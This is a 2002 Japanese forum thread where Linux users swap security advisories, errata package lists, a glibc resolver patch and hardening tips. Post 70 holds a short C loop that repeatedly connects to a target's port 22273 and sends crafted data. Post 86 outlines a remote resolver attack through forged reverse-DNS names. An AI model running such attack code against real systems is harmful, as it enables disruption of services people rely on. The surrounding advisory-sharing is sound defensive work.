1 名前:login:Penguin [02/02/02 13:55 ID:TzxKF1DS] 日々発見されるセキュリティホール。 その情報を一人であつめるのは大変です。情報の共有をしましょう。 先人達が埋めてくれた穴は、ありがたく反映させていただきましょう。 www.redhat.co.jp/support/errata/rh72-errata-security.html www.turbolinux.co.jp/security/ www.vinelinux.org/errata/2x/i386.html www.debian.org/security/ ML等からの情報もよろしく
11 名前:login:Penguin mailto:sage [02/02/06 13:22 ID:aFEtGAeu] 関連スレッド pc.2ch.net/test/read.cgi/unix/995966668/
12 名前:login:Penguin [02/02/06 16:18 ID:CGfU8woV] 彼女のセキュリティーホールを守るにはどうしたらいいですか?
13 名前:login:Penguin mailto:sage [02/02/06 16:35 ID:WFWamG0l] >>12 貞操帯
14 名前:login:Penguin mailto:sage [02/02/06 16:56 ID:IgP4o0CH] >>13 予防的手段だけに頼ってはいけない。 インテグリティーチェックと定期的なログ監査。事後対策も忘れずに!
15 名前:login:Penguin mailto:sage [02/02/06 17:36 ID:suxHB5vN] >>12 常時自分がログインしておくというのは?
16 名前:login:Penguin mailto:sage [02/02/06 17:50 ID:YEmPbmK+] >>12 電源切っとけ。
17 名前:login:Penguin mailto:sage [02/02/06 19:28 ID:25EU2pWE] パッチうぉ あてよう
18 名前:login:Penguin [02/02/18 21:43 ID:7km2bSU3] SNMPセキュリティーホールage。 つーか、使ってる人いるのか? 使わんのだったら、パケジ消しとけ。 www.debian.org/ www.turbolinux.co.jp/security/
19 名前:login:Penguin mailto:sage [02/02/18 22:09 ID:Y/OOH446] at, uucp, ucd-sntpなんて個人でLinuxやってる場合は要らんとおもう
20 名前:rrdtool [02/02/18 22:38 ID:e0R/XIhl] net-snmp 4.2.3をtar玉から入れてる人は snmpnetstatのfixパッチも当てたほうがエエぞ fixパッチはredhatのSRPMから頂くとよろし
21 名前:login:Penguin [02/02/18 23:03 ID:xV7FaOh2] uucp、ucd-snmpはともかく、atは...まぁ、無くてもこまらんか。 ともかく、RPM系のディストリビューションで、「全部」とかで インストールしてると、入ってる可能性大だから、用チェック かとおもうですはい。
22 名前:login:Penguin mailto:age [02/03/03 03:46 ID:631jyWWL] ipchainsの設定をしてみました。この設定はどうでしょうか? # ipchains -nL Chain input (policy ACCEPT): target prot opt source destination ports fw all ------ 0.0.0.0/0 0.0.0.0/0 n/a Chain forward (policy DENY): target prot opt source destination ports MASQ all ------ 192.168.1.0/24 0.0.0.0/0 n/a Chain output (policy ACCEPT): Chain fw (1 references): target prot opt source destination ports ACCEPT tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 25 ACCEPT tcp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023 ACCEPT udp ------ 192.168.1.0/24 0.0.0.0/0 * -> 0:1023 DENY tcp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023 DENY udp ------ 0.0.0.0/0 0.0.0.0/0 * -> 0:1023
23 名前:login:Penguin mailto:sage [02/03/03 12:16 ID:SZmEd9Su] >>22 スレ違い。質問スレでやっとけ。
24 名前:login:Penguin [02/03/03 12:18 ID:SZmEd9Su] www.turbolinux.co.jp/security/php-4.1.2-1.html PHPボロボロだな
25 名前:login:Penguin [02/03/07 15:55 ID:cquF55ex] 3/6 Vine-errata security hole squid-2.3.STABLE5-0vl2.i386.rpm
26 名前:zlib! mailto:age [02/03/12 16:41 ID:UaXqoxZ1] zlib祭りだYO! www.linuxsecurity.com/articles/security_sources_article-4582.html www.kb.cert.org/vuls/id/368819
27 名前:login:Penguin [02/03/12 21:43 ID:lpFBAfJZ] www.zdnet.co.jp/news/0203/12/e_linux.html
28 名前:login:Penguin mailto:sage [02/03/12 21:57 ID:e6hdJtN/] zlib祭り会場はどこですか?
29 名前:login:Penguin [02/03/12 23:21 ID:11TI6bf4] >>28 あなたのおうちの犬箱です
30 名前:login:Penguin mailto:sage [02/03/12 23:25 ID:tWqbf2NQ] ftp.mozilla.orgが繋がらないのはzlib祭りのお陰ですか?
31 名前:sage mailto:sage [02/03/13 00:41 ID:mlfLGoSb] www.kb.cert.org/vuls/id/368819 cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-0059 www.gzip.org/zlib/advisory-2002-03-11.txt slashdot.jp/article.pl?sid=02/03/12/1325239&mode=nested www.ipa.go.jp/security/news/news.html www.st.ryukoku.ac.jp/~kjm/security/memo/2002/03.html#20020312_zlib
32 名前:login:Penguin [02/03/13 02:02 ID:Rw4EvJaU] 3/12 Vine-errata security hole openssh-2.9.9p2-0vl0.3.i386.rpm openssh-clients-2.9.9p2-0vl0.3.i386.rpm openssh-server-2.9.9p2-0vl0.3.i386.rpm openssh-askpass-2.9.9p2-0vl0.3.i386.rpm
33 名前:login:Penguin [02/03/13 08:10 ID:P2nMMkSR] げー、zlibやばいなぁ。ローカルからの攻撃には無力っぽいね。 ブラウザ経由の攻撃もできるのかなぁ... (不正なPNG送るとかで)
34 名前:名無しさん@お腹いっぱい。 mailto:sage [02/03/13 09:00 ID:X9FAJrTn] mod_gzipとかやばそうだね
35 名前:名無しさん@Emacs [02/03/13 10:03 ID:uVnzr98W] >>33 まぁ何はなくともさっさとzlibを更新(-> 1.1.4)することだね。 pngやgzipを直接解釈するようなサーバでもない限り外部からの攻撃は受けない だろうし、apacheをrootで動かしてるような豪快な奴も居ない(と信じたい) だろうから、あまり大きな問題にはならないだろうけど。
36 名前:zlib! mailto:age [02/03/13 11:47 ID:zAIB51rk] bugtraqに出てたH D Moore氏のpngの画像を XEmacsでプレビューしたらXEmacsが落ちたYO!
37 名前:zlib! mailto:age [02/03/13 11:54 ID:zAIB51rk] >>36 サンプル画像はここにもあるYO! www.digitaloffense.net/openssh_zlib/
38 名前:login:Penguin mailto:sage [02/03/13 19:47 ID:dfFI4Er/] >>36 他力本願で申し訳ないが、coreとか調べてみました? 結局どーなってどーなっちゃうのかよくわからんもので・・・。 stackoverflowと同様だと思ってればいいのかな〜
39 名前:login:Penguin mailto:sage [02/03/13 23:37 ID:7LNGAJrc] apache って root で動かすとやばいの?
40 名前:login:Penguin mailto:sage [02/03/14 00:38 ID:6jzSzsuH] >>39 そりゃやばいだろ (;´Д`)
41 名前:zlib! mailto:sage [02/03/14 11:03 ID:Ok5u5E1d] >>38 XEmacs(bamboo)はsignal 11で落ちたみたい coreはあるけどgdb扱える能力無いのよ。すまん で、zlib最新にしてlibpngリコンパイルしたら落ちなくなったYO!
42 名前:login:Penguin mailto:sage [02/03/16 19:05 ID:49Bp+Ljr] Debian セキュリティ HOWTO www.jp.debian.org/doc/manuals/securing-debian-howto/
43 名前:login:Penguin [02/03/21 09:18 ID:l6UXxXqO] 3/21 Vine-errata security hole zlib-1.1.3-25vl0.i386.rpm zlib-devel-1.1.3-25vl0.i386.rpm cvs-1.11.1p1-7vl0.i386.rpm dump-0.4b19-5.6x.1.i386.rpm dump-static-0.4b19-5.6x.1.i386.rpm kernel-2.2.19-0vl0.24.i386.rpm kernel-2.2.19-0vl0.24.i586.rpm kernel-2.2.19-0vl0.24.i686.rpm kernel-BOOT-2.2.19-0vl0.24.i386.rpm kernel-doc-2.2.19-0vl0.24.i386.rpm kernel-headers-2.2.19-0vl0.24.i386.rpm kernel-ibcs-2.2.19-0vl0.24.i386.rpm kernel-pcmcia-cs-2.2.19-0vl0.24.i386.rpm kernel-smp-2.2.19-0vl0.24.i386.rpm kernel-smp-2.2.19-0vl0.24.i586.rpm kernel-smp-2.2.19-0vl0.24.i686.rpm kernel-source-2.2.19-0vl0.24.i386.rpm kernel-utils-2.2.19-0vl0.24.i386.rpm rmt-0.4b19-5.6x.1.i386.rpm rpm-3.0.6-0vl2.1.i386.rpm rpm-build-3.0.6-0vl2.1.i386.rpm rpm-devel-3.0.6-0vl2.1.i386.rpm rpm-python-3.0.6-0vl2.1.i386.rpm popt-1.5.1-0vl2.1.i386.rpm rsync-2.4.1-2vl2.i386.rpm sash-3.4-2vl0.i386.rpm info-4.0-5vl0.i386.rpm texinfo-4.0-5vl0.i386.rpm
44 名前:login:Penguin [02/03/21 09:18 ID:l6UXxXqO] 3/21 Vine-errata security hole apache-1.3.23-0vl0.1.i386.rpm apache-devel-1.3.23-0vl0.1.i386.rpm apache-manual-1.3.23-0vl0.1.i386.rpm mod_ssl-2.8.7-0vl0.1.i386.rpm fileutils-4.0x-1vl4.i386.rpm
45 名前:login:Penguin [02/04/05 12:26 ID:ikMkS74J] 04/04 Vine-errata security hole XFree86-3.3.6-13vl28.1.i386.rpm XFree86-100dpi-fonts-3.3.6-13vl28.1.i386.rpm XFree86-75dpi-fonts-3.3.6-13vl28.1.i386.rpm XFree86-3DLabs-3.3.6-13vl28.1.i386.rpm XFree86-8514-3.3.6-13vl28.1.i386.rpm XFree86-AGX-3.3.6-13vl28.1.i386.rpm XFree86-FBDev-3.3.6-13vl28.1.i386.rpm XFree86-I128-3.3.6-13vl28.1.i386.rpm XFree86-Mach32-3.3.6-13vl28.1.i386.rpm XFree86-Mach64-3.3.6-13vl28.1.i386.rpm XFree86-Mach8-3.3.6-13vl28.1.i386.rpm XFree86-Mono-3.3.6-13vl28.1.i386.rpm XFree86-P9000-3.3.6-13vl28.1.i386.rpm XFree86-S3-3.3.6-13vl28.1.i386.rpm XFree86-S3V-3.3.6-13vl28.1.i386.rpm XFree86-SVGA-3.3.6-13vl28.1.i386.rpm XFree86-VGA16-3.3.6-13vl28.1.i386.rpm XFree86-W32-3.3.6-13vl28.1.i386.rpm XFree86-XF86Setup-3.3.6-13vl28.1.i386.rpm XFree86-Xnest-3.3.6-13vl28.1.i386.rpm XFree86-Xvfb-3.3.6-13vl28.1.i386.rpm XFree86-cyrillic-fonts-3.3.6-13vl28.1.i386.rpm XFree86-devel-3.3.6-13vl28.1.i386.rpm XFree86-doc-3.3.6-13vl28.1.i386.rpm XFree86-libs-3.3.6-13vl28.1.i386.rpm XFree86-xfs-3.3.6-13vl28.1.i386.rpm
46 名前:login:Penguin [02/04/11 21:08 ID:n5epu8MN] 04/11 Vine-errata security hole squid-2.3.STABLE5-0vl4.i386.rpm
47 名前:名無しさん [02/04/12 15:15 ID:357cbhyA] ぼくの肛門も埋めてください
48 名前:login:Penguin [02/05/14 10:29 ID:nCRPXE+h] 05/14 Vine-errata security hole sudo-1.6.3p6-0.6vl3.i386.rpm
49 名前:login:Penguin mailto:sage [02/05/28 18:43 ID:nc9YjYw6] apt-get update apt-get upgrade だけでは不十分ですか?
50 名前:login:Penguin mailto:age [02/05/28 18:43 ID:nc9YjYw6] age忘れ。
51 名前:login:Penguin [02/06/03 00:38 ID:ecxsuEIo] 僕のチンポの先も埋めてください
52 名前:login:Penguin [02/06/03 00:54 ID:Yo9snOlP] >apt-get update >apt-get upgrade > >だけでは不十分ですか? ヴァカじゃん。そういう姿勢がそもそもsecurity hole
53 名前:login:Penguin [02/06/06 13:09 ID:H4e/6DmJ] 06/06 Vine-errata security hole fetchmail-5.9.11-0vl1.i386.rpm imap-2001a-10vl1.i386.rpm imap-devel-2001a-10vl1.i386.rpm bzip2-1.0.1-3vl3.i386.rpm bzip2-devel-1.0.1-3vl3.i386.rpm
54 名前:login:Penguin [02/06/13 09:25 ID:+8hN98ol] 06/13 Vine-errata security hole tcpdump-3.6.2-13vl1.i386.rpm libpcap-0.6.2-13vl1.i386.rpm arpwatch-2.1a11-13vl1.i386.rpm
55 名前:login:Penguin [02/06/18 15:41 ID:Y4ljwPvb] Apacheにセキュリティホール slashdot.jp/article.pl?sid=02/06/18/0434227 UNIX板 Apache関連 Part2 pc.2ch.net/test/read.cgi/unix/1017812420/466n-
56 名前:login:Penguin mailto:sage [02/06/19 08:45 ID:HipJ6wEK] バグフィクスされたapacheがリリースされたそうです。 www.apache.org/dist/httpd/Announcement.html httpd.apache.org/info/security_bulletin_20020617.txt
57 名前:login:Penguin [02/06/19 23:43 ID:APWNucgQ] 06/19 Vine-errata security hole apache-1.3.26-0vl1.i386.rpm apache-devel-1.3.26-0vl1.i386.rpm apache-manual-1.3.26-0vl1.i386.rpm mod_ssl-2.8.9-0vl1.i386.rpm
58 名前:login:Penguin [02/06/20 10:16 ID:01vvi0s8] >>55 Red Hat rhn.redhat.com/errata/RHSA-2002-103.html
59 名前:login:Penguin [02/06/20 10:44 ID:gutuxgNU] Debian (potato) DSA-131-1 apache -- remote DoS / exploit www.debian.org/security/2002/dsa-131 DSA-132-1 apache-ssl -- remote DoS / exploit www.debian.org/security/2002/dsa-132
60 名前:login:Penguin [02/06/20 13:37 ID:RkoCmceO] Apache のそれは 32bit Linux でもヤバそう。 某MLにexploitが流れてた。
61 名前:login:Penguin [02/06/20 13:56 ID:gutuxgNU] Apache Web サーバプログラムの脆弱性に関する注意喚起 www.jpcert.or.jp/at/2002/at020003.txt
62 名前:login:Penguin [02/06/20 14:06 ID:RkoCmceO] 情報スカスカのJPCERT勧告なんぞ読んでも仕方無いぞ。ほい日本語版。 www.lac.co.jp/security/intelligence/CERT/CA-2002_17.html
63 名前:login:Penguin mailto:sage [02/06/20 14:24 ID:01vvi0s8] こっちはそれなりに有用。 www.ipa.go.jp/security/ciadr/20020619apache.html
64 名前:名無しさん mailto:sage [02/06/22 23:55 ID:STj3pUTJ] 「くだ質」とどちらに投げようか迷った挙げ句、こちらに 投げることにしました。 以下のような自分の使用状況がセキュリティの面で安全か どうか伺いたく存じます。 自宅でLinuxを使っています。Flets ADSLを契約しており、 常時接続ではなく、時々インターネットに接続して電子 メールを読み書きしたり、WWWで情報を得たりしています。 ルータ等は使っていません。他のホストにwwwやftpで クライエントとして接続することはあっても、自ホストを サーバにする必要は殆どないと考えています。ただ例外で、 smtpサーバとしてnullmailerを使っています。 Debian GNU/Linux sidを使っており、電源を入れる度に apt-getでパッケージを更新しています。 ftpd、rsh-server、ssh、apache等は削除しています。 kernelは2.4.18です。 /etc/hosts.allowは何も記述せず、 /etc/hosts.denyはALL: ALLにしてます。 # netstat --tcp --all は、 Proto 受信-Q 送信-Q 内部アドレス 外部アドレス 状態 tcp 0 0 *:time *:* LISTEN tcp 0 0 *:32927 *:* LISTEN tcp 0 0 xxx.yyy.zzz.uuu:33011 aaa.bbb.ccc.ddd:smtp TIME_WAIT となります(xxx.yyy.zzz.uuuは割り当てられたIPアドレス、 aaa.bbb.ccc.dddはプロバイダのメールサーバのIPアドレス)。
65 名前:login:Penguin mailto:sage [02/06/23 00:03 ID:bXEc0h6E] >>64 > 以下のような自分の使用状況がセキュリティの面で安全か > どうか伺いたく存じます。 「安全」と「安全でない」の2つしか状態がないと思ってる?
66 名前:login:Penguin [02/06/23 00:47 ID:knGXFfYf] Apache の脆弱性を攻撃するツールが登場 slashdot.jp/article.pl?sid=02/06/22/1240249&mode=thread
67 名前:login:Penguin [02/06/23 01:02 ID:kepzSriJ] >>66 充分に気をつけているほうだと思うよ。 でもセキュリティにこれで完璧ってのは無いんだよ。 あくまでコストとリスクとの綱引きでしかない。 しかしそれで侵入されたからって君を責める人はあまりいないだろう。
68 名前:login:Penguin mailto:sage [02/06/23 01:25 ID:xLORxFdI] >>66 inetdも止めてしまおう。
69 名前:login:Penguin [02/06/25 15:34 ID:drybiZ1b] OpenSSH に新たな弱点発見。詳細は来週まで秘密。 リモートから悪用可能らしい。 3.3 にも同じ弱点があるが、侵入は防げるそうだ。
70 名前:login:Penguin mailto:sage [02/06/25 22:33 ID:yPSMZ+Jm] void writei(int fd,int num){num = htonl(num);write(fd,&num,4);} void writes(int fd,char *s){write(fd,s,strlen(s)+1);} void main(int argc,char **argv){struct hostent *he;struct sockaddr_in si;int fd; char a[10];he = gethostbyname(argv[1]);while(1){fd = socket(PF_INET,SOCK_STREAM,0);si.sin_family = AF_INET;memcpy(&si.sin_addr,he->h_addr_list[0],sizeof(si.sin_addr)); si.sin_port = htons(22273);connect(fd,(struct sockaddr *)&si,sizeof(si));sprintf(a,"%d",rand());writei(fd,0x66);writei(fd,0); writes(fd,a);writei(fd,0);writei(fd,3);close(fd);}}
71 名前:login:Penguin [02/06/25 22:46 ID:LJSlbrtr] >>69 これだね。 Debian 以外のパッケージはいつころ出るんだろ。 www.koka-in.org/~haruyama/ssh_koka-in_org/0/4.html
72 名前:login:Penguin mailto:sage [02/06/26 09:06 ID:yIavaL89] >70 Wnnか?何の穴よ? まさかwww.freewnn.orgにある大昔の穴じゃないだろうな。
73 名前:login:Penguin mailto:sage [02/06/26 20:58 ID:0uLnP27B] >>72 違うっぽい。
74 名前:login:Penguin [02/06/26 22:51 ID:knPs+H7Y] *BSD の libc の resolver に穴が見つかったようだけど、glibc は どうなんだろう www.pine.nl/advisories/pine-cert-20020601.html
75 名前:login:Penguin [02/06/27 00:16 ID:UFWmO8g6] ISS から OpenSSH のアドバイザリが出た。 Challenge and Response 認証にバグ。remote root exploit。 sshd_config に ChallengeResponseAuthentication no で回避可能。3.4 で修正されている。 これがもし Theo の言ってた穴と同じものなら、 OpenSSH 3.0 以降にのみ存在する穴じゃん。 いちはやくアップデート出した Debian potato は踊らされただけか。
76 名前:login:Penguin [02/06/27 00:18 ID:UFWmO8g6] OpenSSH Advisory www.openssh.com/txt/preauth.adv
77 名前:login:Penguin [02/06/27 00:19 ID:UFWmO8g6] さみだれ式でごめん。ISS Advisory www.openssh.com/txt/iss.adv
78 名前:login:Penguin [02/06/27 00:31 ID:UFWmO8g6] >>75 訂正。3.0 以降じゃなくて 2.9.9 以降に弱点がある模様。 Debian 2.2 (potato) は安全な 1.2 系からわざわざ弱点のある 3.3 に入れ換えさせられた恰好だよ。Theo のアホーーーーー。 フルディスクロージャってやっぱり大事なんだな。
79 名前:login:Penguin [02/06/27 01:53 ID:b3kvzA+X] 06/27 Vine-errata security hole openssh-3.3p1-0vl10.i386.rpm openssh-server-3.3p1-0vl0.i386.rpm openssh-clients-3.3p1-0vl0.i386.rpm openssh-askpass-3.3p1-0vl0.i386.rpm openssh-askpass-gnome-3.3p1-0vl0.i386.rpm
80 名前:login:Penguin mailto:sage [02/06/27 01:59 ID:b3kvzA+X] >>79 は 06/26 発行でした。スマソ
81 名前:login:Penguin [02/06/27 11:42 ID:/viQ/aAY] openssh 3.4p1出てるよage
82 名前:login:Penguin mailto:sage [02/06/27 11:52 ID:EftB/YmL] syslogdが大きい。
83 名前:login:Penguin [02/06/27 16:56 ID:QDJgHCs7] resolver のバグは対岸の火事ではない模様。
84 名前:login:Penguin mailto:sage [02/06/27 17:20 ID:/viQ/aAY] 2ch鯖のApacheも入れ替えが始まってるね。 遅いぐらいだ。昨日の件もこれが絡んでたのだろうか。 しかし入れ替えたはいいがlinuxのlibcにも。。。。 なんてことになったら大火事だな。
85 名前:login:Penguin mailto:sage [02/06/27 18:16 ID:d3NH2M4p] >>84 まさに大火事のようで(藁 まあ、リモートからいじれる穴ではないだろうけど
86 名前:login:Penguin [02/06/27 18:57 ID:QDJgHCs7] >>85 resolver のバグはリモートからいじれる。 攻撃者は自由に設定出来るネームサーバを持っていればいい。 ある IP アドレスの逆引きホストネームに攻撃用コードを仕込む。 そしてその IP アドレスから攻撃対象のサーバに接続する。 攻撃対象のサーバが逆引きを行い、 返って来た巧妙に細工されたホスト名を正引きしたら、あぼーん。
87 名前:login:Penguin mailto:sage [02/06/27 20:05 ID:4+mBkHBL] glibcには*BSDよりも1箇所余計にチェックが入っているが、 これでは防げないのか?
88 名前:login:Penguin mailto:sage [02/06/27 20:31 ID:GRjz2eTH] OpenSSHを3.1→3.4にアップグレードしたら、sshdの起動時に This platform does not support both privilege separation and compression Compression disabled こんなメッセージを吐くんだけど・・・何だろ?syslogには上がらないみたいだけど気になるかな。 ちなみにRedHat6.2(kerner2.2.19/glibc2.1.3-23/OpenSSL0.9.6d)
89 名前: mailto:sage [02/06/27 20:37 ID:oX2io58x] >>88 Compressionは切ろう。
90 名前:login:Penguin [02/06/27 20:41 ID:QDJgHCs7] >>87 実際テストしてみたが落せない。 俺がヘボなだけかもしれないから識者の意見を待とう。
91 名前:88 mailto:sage [02/06/27 20:42 ID:GRjz2eTH] >>89 sshd_configのCompressをnoに指定したら出なくなったよ。 感謝。
92 名前:login:Penguin mailto:sage [02/06/27 21:00 ID:4+mBkHBL] >>90 FreeBSDをパッチを見るに、gethnamaddr.cはずでにFreeBSDの パッチと同じ処理が入っている。getnetnamadr.cにはない。
93 名前:login:Penguin [02/06/27 21:00 ID:QDJgHCs7] >>90 識者の意見が間違ってた Aapche の時のような事もあるから itojun 氏のパッチあててもいいかもしれない。 でも勇み足で必要でないアップデートを出して、わざわざ穴を 開けてしまったDebian potato の例もあるし、悩ましいところだな。
94 名前:login:Penguin [02/06/27 21:13 ID:QDJgHCs7] 識者登場age。
95 名前:login:Penguin mailto:sage [02/06/27 21:32 ID:4+mBkHBL] 直すべきは nss_dns/dns-network.c か。 古いの見てた。すまそ。
96 名前:login:Penguin [02/06/28 11:19 ID:CALm/HoI] 新しいBINDが出た
97 名前:login:Penguin mailto:sage [02/06/28 13:40 ID:PahA8xFy] >>93 itojunさんのパッチってどこでgetできます? glibcに当たるのかいな?
98 名前:login:Penguin [02/06/28 16:13 ID:DZqksx+C] >>97 FreeBSD や NetBSD の Advisory 嫁。 そのままでは当たらないだろうから手作業で当てれ。 ま、俺はめんどいから様子見。
99 名前:login:Penguin mailto:sage [02/06/28 20:57 ID:Yj/G45g0] つーか、おまえら誰もglibcのコード読んでないんとちゃうか?
100 名前:login:Penguin mailto:sage [02/06/28 21:47 ID:Yj/G45g0] --- glibc-2.2.5/resolv/nss_dns/dns-network.c.org 2001-07-06 13:55:39.000000000 +0900 +++ glibc-2.2.5/resolv/nss_dns/dns-network.c 2002-06-28 21:42:26.000000000 +0900 @@ -328,7 +328,9 @@ } cp += n; *alias_pointer++ = bp; - bp += strlen (bp) + 1; + n = strlen(bp) + 1; + bp += n; + linebuflen -= n; result->n_addrtype = class == C_IN ? AF_INET : AF_UNSPEC; ++have_answer; } こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の 処理がすでに入っている。
101 名前:名無しさん@XEmacs mailto:sage [02/06/29 01:29 ID:cleVXGS3] >>100 > こんなとこではないかな。gethnamaddr.cはFreeBSDのパッチと同様の > 処理がすでに入っている。 name6.c のチャンクは? と思ったけど,'99 に直ってるすね. ttp://sources.redhat.com/cgi-bin/cvsweb.cgi/libc/resolv/nss_dns/dns-host.c.diff?r1=1.15&r2=1.16&cvsroot=glibc&f=h
102 名前:login:Penguin [02/06/29 04:06 ID:uLF75Z2Y] >>79 Vine-errata security hole openssh-3.4p1-0vl2.i386.rpm openssh-server-3.4p1-0vl2.i386.rpm openssh-clients-3.4p1-0vl2.i386.rpm openssh-askpass-3.4p1-0vl2.i386.rpm openssh-askpass-gnome-3.4p1-0vl2.i386.rpm
103 名前:login:Penguin mailto:sage [02/07/02 09:30 ID:QAyrQPMn] >>100-101 通報しますた。
104 名前:login:Penguin mailto:sage [02/07/02 11:35 ID:qVWzSPns] www.sendmail.org/8.12.5.html > 8.12.5/8.12.52002/06/25 > SECURITY: The DNS map can cause a buffer overflow if the user > specifies a dns map using TXT records in the configuration > file and a rogue DNS server is queried. None of the > sendmail supplied configuration files use this option hence > they are not vulnerable. Problem noted independently by > Joost Pol of PINE Internet and Anton Rang of Sun Microsystems. 普通の設定では影響なし、なのかな?
105 名前:login:Penguin mailto:sage [02/07/02 11:44 ID:qVWzSPns] resolver 問題、CERT/CC によると glibc はこれで fix されてるらしい。 www.kb.cert.org/vuls/id/AAMN-5BMSW2 しかし、こういうのって他のプロジェクトに還元されないもんなんだろうか。
106 名前:login:Penguin mailto:age [02/07/02 12:47 ID:KLRYFYVU] 上のパッチ、だれかUlrich Drepperに投げた?
107 名前:地獄狂 YahooBB219017000159.bbtec.net ◆7WP8X9hw [02/07/02 13:39 ID:hdi7nBII] よくわかんないんだけど、glibcのバグはどのバージョンにあるの?
108 名前:login:Penguin mailto:sage [02/07/04 02:52 ID:qk/rUU9i] >>57 07/02 Vine-errata security hole apache-1.3.26-0vl2.i386.rpm apache-devel-1.3.26-0vl2.i386.rpm apache-manual-1.3.26-0vl2.i386.rpm mod_ssl-2.8.9-0vl2.i386.rpm
109 名前:login:Penguin mailto:sage [02/07/04 13:55 ID:50T+DZdt] dammit.lt/apache-worm/ このApacheワームのソースってどこから出たものなのかな。 ワーム自体は蜜壷で捕まえたみたいだけど。
110 名前:login:Penguin [02/07/04 14:07 ID:nB1GJwB4] Squid Proxy Cache Security Update Advisory SQUID-2002:3 - Security advisory several issues in Squid-2.4.STABLE6 and earlier. Squid-2.4.STABLE7 released to address these issues. www.squid-cache.org/Advisories/SQUID-2002_3.txt
111 名前:login:Penguin mailto:sage [02/07/04 14:13 ID:WhJXedKe] >>109 投稿した人は「僕の inbox に入ってた」って言ってた。